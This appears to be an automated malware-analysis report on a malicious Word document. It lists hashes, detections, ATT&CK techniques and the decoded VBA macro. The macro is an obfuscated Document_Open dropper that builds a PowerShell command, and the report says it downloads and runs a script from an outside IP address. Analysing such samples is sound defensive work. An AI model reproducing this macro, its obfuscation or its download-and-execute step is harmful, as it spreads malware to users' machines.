Office (OLE) malware analysis — malicious · c413d4f2b81c5871

MALICIOUS

Office (OLE)

247.5 KB Created: 2018-07-09 18:11:00 Authoring application: Microsoft Office Word First seen: 2018-07-27

MD5: 6d0514a4eca174d5c373a407cc0ac722 SHA-1: eb463f4c1987d1e84f1d16439f46bb621c41cf95 SHA-256: c413d4f2b81c58717d19fedfbaf5cea74542f23dc55afde48c8ca821c4d14fdf

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes a Shell command. This macro is designed to run a PowerShell command that downloads and executes a script from the URL 'http://185.189.255.147/a.ps1'. This indicates a downloader or droppper functionality, common in initial stages of compromise.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6605488-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6605488-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17521 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17521 bytes
SHA-256: `68579fa79c66198cb7d7e6ba42810e7e847df718a9060862080084be67141413`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "dfDNsOd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next iICdz = 64039 - iDhuhF - wLZkJ / MOuXfv + qjbNj + hVcMT - RCIjZV / VRcIwJ - 95141 / BTNfw - PJCbT * MYfUz uGTwQR = 48675 - wALdVG - uEQfQk / qWWQP + DpkzBD + bWKJlC - BntWj / AAHqP - 91846 / kPwaz - qnHPO * SYUYtH SkMQt = 6811 - WOZJNV - EXjpQ / iusWAp + HLwipp + pRipUL - iDDZH / vktjWc - 86611 / XrqQDS - LRvUXZ * nsrUF mHJrAF = 63002 - oscziP - iwPaDr / GSlmqm + XPtibO + OlDjc - MVFVsm / bJpjQF - 14736 / rFOPu - RdiVD * pQMLt LqqFAsdzEIjE ("" + fDiVCwZANXdEl + BOhUXCtGHFJ + JoJpHAsLBO + jvWmFzlr + KrpDaolSQ + KUSMkw + ozsHpXRQIMwVS + YQtYSlIEjIiwA) QjvpL = 43358 - uAujr - DKdTM / AtnYz + zIpfOz + rkGNQ - aDLGN / lsFXV - 79584 / tBqRcL - LOOUPm * NzlzwM HomaVO = 72824 - kUpnGR - SiCTL / prrbG + sUaZc + GtCfBp - ZWdAZw / wwSSts - 73381 / SzvzOq - XKvNKz * wncMl XQXjC = 87272 - wcKtB - HaDwOF / ELElF + sJzLaR + HojwlW - BUQOZj / zIEfi - 90946 / zLMla - BNwRj * bfSuFM End Sub Attribute VB_Name = "LrRcRatBHfjrj" Function JoJpHAsLBO() On Error Resume Next EbcOj = (51328 / UZCkVQ / MzNjOF - Jqsoi - (95067 + ksnwj / 98512 * OcmLCP)) RAwUbU = plaJZ + iMJvb * 97576 * 15531 jTfzlz = Qpqwqv + jZzdYk * 63738 * 29181 KZnXZPK = "p" + itMNZrABRhqik + pUiGFUaKQP + "owe" + oFQiEJKTb + lwkYssSA + "rsh" + cmidiCWD + wIdMwBCmZahsZO + "ell" + UviRzOpG + mBZGnQsTH + " " + YcrpjbBakN + VibVRzkTWAiO + "." + SmRzGGQn + qbRnnjbFW + "( $" + YMubWXJ + zcoUIPIkGJ + "pSH" + mIipjwjqYZsk + ZWXjiGpXVNnwfX + "O" + wMwVmEQmpbdHz + DMNplMXbNtOn + "M" + jRIShaj + IVGluHdiXwdj + "e[" + imibljcXQ + GJUoSwEQZFTf + "4]" + Chr(43) + TkLqrmSwAaj + vEKkFGBnzItFzZ + "$P" + LOGCwRwR + NSHJuHPwIL + "Sho" + OZZoWcRktM + oLZABdGtCftjj + "me[" lqzQI = rAhdJv + zwjAT * 39572 * 41298 ktGzsP = SdDbB + CaZRBm * 1511 * 25012 OzfFVR = jqIiPf + uwqqzL * 84761 * 44355 wYiZFGiWzdL = "30" + mEdiYYp + wVcLjnb + "]" + Chr(43) + lbSsKnPYu + qVdZDMolhuFO + "'X'" + ohwNhOLDzUsjut + AdzHObrDI + ")" + pPVfNiwVFRKMbY + IjTSuvStbO + "( " + NpuEKPWoboiB + kzpRXibDiW + "nE" + EuwbEwG + PWGCMCww + "w-" + SVWKVEK + EKHYPFLcsAkfuh + "O" + ajOLfdGOUW + jaWtHMKwIwqz + "bj" + GwjWXnHqvVw + bDsEtWisR + "EC" XiWQLb = RKFWKi + zvZsfB * 95347 * 54755 vPuzaW = pSswoQ + iTciUI * 8778 * 85315 ROpsAfU = "t i" + bEAmbtvjnVvhvq + hslwKiiOLY + "O" + qiCBoDzS + rzDEdVi + "." + ohkWAbHjwWla + ntISttsrVqi + "STR" + vFBMfZriaFIC + UDvvcoZPKVD + "Eam" + owLtrzpLdvJFB + NoAPTMYoZuCMNj + "Re" + IrfDiOLQDkU + lqaddCWU + "A" + jQIlzpmcfi + OVHNwck + "D" + shjnEcjjdXLU + mZcMbQIoHtkbEV + "er" + ukbloic + MCsCKDjrWVnVQJ + "( " DanCcY = TZdbs + LDziRO * 27097 * 29458 KRqrw = hMRdzw + qOrrzz * 24060 * 53861 pEkhAb = ibjJkI + vSooYc * 64384 * 54197 lESjwYiqlLs = "( " + jwaZqKPN + XilrfjzzTfr + "nEw" + wajkicbdjWh + UHVHOji + "-O" + fGATSNiHP + XczJZjlpAnLE + "bj" + MrbMQHONiua + JNzbHQVds + "ECt" + hhwsMfUB + GVCvwJYJzEipS + " S" + BLEoNBUjPij + AwZZSYCrwf + "YS" + zTuDdrO + LUQNDommn + "Te" + BCJwiJXtY + fviQhZf + "m." + UlEoiJLOkQEJO + uKwYTTV + "IO." + HoUfnHMHBduP + TVzIJHivQC + "COM" + WdHSTznXhp + bdEzHkwpwqc + "PR" + KMqCLYRCQk + jKvbami + "ESs" + hfDhofEnZ + DwInzVW + "iO" iKtUz = (aCOVE / XEdjmU - (44774 - NOrEiw + 75218 / 3435)) GufjoQE = "N" + PNHnWmi + FBZDbCfrf + ".D" + AzYJPTom + YukPolPRGuDk + "EFL" + MpndjQvWCTFQ + XDwwjijHoomRQa + "aTE" + HPrlzZfL + pCrRKYwRtDvH + "s" + GEAzqPAUwpM + CAzXmqwoiP + "TR" + OUwhVQzNOfs + VqjVDCETzuR + "ea" + IQDobpcVbvC + ZMcKWHYrRAO + "M( " + NSJPZjlpHiK + DwKtvhi + "[s" + sroXJXnrQoV + JLLVVBnRdSk + "Y" + bhXEhlA + SaBXOBQSWFD + "st" + wiaMjnLOYEFF + TMHjArjs + "e" + wnmBLwiOdp + iVENZMtWwSSuw + "M." + VDjDFwGNs + DcZrbGYi + "i" WSYdp = (QjGji / XJFzvP - (62320 - UvnJiS + 51271 / 7148)) fmSXwO = (jUrEF / JKtlcq - (46017 - MMOJR + 92757 / 9508)) GKaSSXd = "O." + SpIVljE ... (truncated)

SHA-256: 68579fa79c66198cb7d7e6ba42810e7e847df718a9060862080084be67141413

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "dfDNsOd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   iICdz = 64039 - iDhuhF - wLZkJ / MOuXfv + qjbNj + hVcMT - RCIjZV / VRcIwJ - 95141 / BTNfw - PJCbT * MYfUz
   uGTwQR = 48675 - wALdVG - uEQfQk / qWWQP + DpkzBD + bWKJlC - BntWj / AAHqP - 91846 / kPwaz - qnHPO * SYUYtH
   SkMQt = 6811 - WOZJNV - EXjpQ / iusWAp + HLwipp + pRipUL - iDDZH / vktjWc - 86611 / XrqQDS - LRvUXZ * nsrUF
   mHJrAF = 63002 - oscziP - iwPaDr / GSlmqm + XPtibO + OlDjc - MVFVsm / bJpjQF - 14736 / rFOPu - RdiVD * pQMLt
LqqFAsdzEIjE ("" + fDiVCwZANXdEl + BOhUXCtGHFJ + JoJpHAsLBO + jvWmFzlr + KrpDaolSQ + KUSMkw + ozsHpXRQIMwVS + YQtYSlIEjIiwA)
   QjvpL = 43358 - uAujr - DKdTM / AtnYz + zIpfOz + rkGNQ - aDLGN / lsFXV - 79584 / tBqRcL - LOOUPm * NzlzwM
   HomaVO = 72824 - kUpnGR - SiCTL / prrbG + sUaZc + GtCfBp - ZWdAZw / wwSSts - 73381 / SzvzOq - XKvNKz * wncMl
   XQXjC = 87272 - wcKtB - HaDwOF / ELElF + sJzLaR + HojwlW - BUQOZj / zIEfi - 90946 / zLMla - BNwRj * bfSuFM
End Sub


Attribute VB_Name = "LrRcRatBHfjrj"
Function JoJpHAsLBO()
On Error Resume Next
EbcOj = (51328 / UZCkVQ / MzNjOF - Jqsoi - (95067 + ksnwj / 98512 * OcmLCP))
   RAwUbU = plaJZ + iMJvb * 97576 * 15531
   jTfzlz = Qpqwqv + jZzdYk * 63738 * 29181
KZnXZPK = "p" + itMNZrABRhqik + pUiGFUaKQP + "owe" + oFQiEJKTb + lwkYssSA + "rsh" + cmidiCWD + wIdMwBCmZahsZO + "ell" + UviRzOpG + mBZGnQsTH + "  " + YcrpjbBakN + VibVRzkTWAiO + "." + SmRzGGQn + qbRnnjbFW + "( $" + YMubWXJ + zcoUIPIkGJ + "pSH" + mIipjwjqYZsk + ZWXjiGpXVNnwfX + "O" + wMwVmEQmpbdHz + DMNplMXbNtOn + "M" + jRIShaj + IVGluHdiXwdj + "e[" + imibljcXQ + GJUoSwEQZFTf + "4]" + Chr(43) + TkLqrmSwAaj + vEKkFGBnzItFzZ + "$P" + LOGCwRwR + NSHJuHPwIL + "Sho" + OZZoWcRktM + oLZABdGtCftjj + "me["
lqzQI = rAhdJv + zwjAT * 39572 * 41298
   ktGzsP = SdDbB + CaZRBm * 1511 * 25012
   OzfFVR = jqIiPf + uwqqzL * 84761 * 44355
wYiZFGiWzdL = "30" + mEdiYYp + wVcLjnb + "]" + Chr(43) + lbSsKnPYu + qVdZDMolhuFO + "'X'" + ohwNhOLDzUsjut + AdzHObrDI + ")" + pPVfNiwVFRKMbY + IjTSuvStbO + "( " + NpuEKPWoboiB + kzpRXibDiW + "nE" + EuwbEwG + PWGCMCww + "w-" + SVWKVEK + EKHYPFLcsAkfuh + "O" + ajOLfdGOUW + jaWtHMKwIwqz + "bj" + GwjWXnHqvVw + bDsEtWisR + "EC"
XiWQLb = RKFWKi + zvZsfB * 95347 * 54755
   vPuzaW = pSswoQ + iTciUI * 8778 * 85315
ROpsAfU = "t i" + bEAmbtvjnVvhvq + hslwKiiOLY + "O" + qiCBoDzS + rzDEdVi + "." + ohkWAbHjwWla + ntISttsrVqi + "STR" + vFBMfZriaFIC + UDvvcoZPKVD + "Eam" + owLtrzpLdvJFB + NoAPTMYoZuCMNj + "Re" + IrfDiOLQDkU + lqaddCWU + "A" + jQIlzpmcfi + OVHNwck + "D" + shjnEcjjdXLU + mZcMbQIoHtkbEV + "er" + ukbloic + MCsCKDjrWVnVQJ + "( "
DanCcY = TZdbs + LDziRO * 27097 * 29458
   KRqrw = hMRdzw + qOrrzz * 24060 * 53861
   pEkhAb = ibjJkI + vSooYc * 64384 * 54197
lESjwYiqlLs = "( " + jwaZqKPN + XilrfjzzTfr + "nEw" + wajkicbdjWh + UHVHOji + "-O" + fGATSNiHP + XczJZjlpAnLE + "bj" + MrbMQHONiua + JNzbHQVds + "ECt" + hhwsMfUB + GVCvwJYJzEipS + " S" + BLEoNBUjPij + AwZZSYCrwf + "YS" + zTuDdrO + LUQNDommn + "Te" + BCJwiJXtY + fviQhZf + "m." + UlEoiJLOkQEJO + uKwYTTV + "IO." + HoUfnHMHBduP + TVzIJHivQC + "COM" + WdHSTznXhp + bdEzHkwpwqc + "PR" + KMqCLYRCQk + jKvbami + "ESs" + hfDhofEnZ + DwInzVW + "iO"
iKtUz = (aCOVE / XEdjmU - (44774 - NOrEiw + 75218 / 3435))
GufjoQE = "N" + PNHnWmi + FBZDbCfrf + ".D" + AzYJPTom + YukPolPRGuDk + "EFL" + MpndjQvWCTFQ + XDwwjijHoomRQa + "aTE" + HPrlzZfL + pCrRKYwRtDvH + "s" + GEAzqPAUwpM + CAzXmqwoiP + "TR" + OUwhVQzNOfs + VqjVDCETzuR + "ea" + IQDobpcVbvC + ZMcKWHYrRAO + "M( " + NSJPZjlpHiK + DwKtvhi + "[s" + sroXJXnrQoV + JLLVVBnRdSk + "Y" + bhXEhlA + SaBXOBQSWFD + "st" + wiaMjnLOYEFF + TMHjArjs + "e" + wnmBLwiOdp + iVENZMtWwSSuw + "M." + VDjDFwGNs + DcZrbGYi + "i"
WSYdp = (QjGji / XJFzvP - (62320 - UvnJiS + 51271 / 7148))
   fmSXwO = (jUrEF / JKtlcq - (46017 - MMOJR + 92757 / 9508))
GKaSSXd = "O." + SpIVljE
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.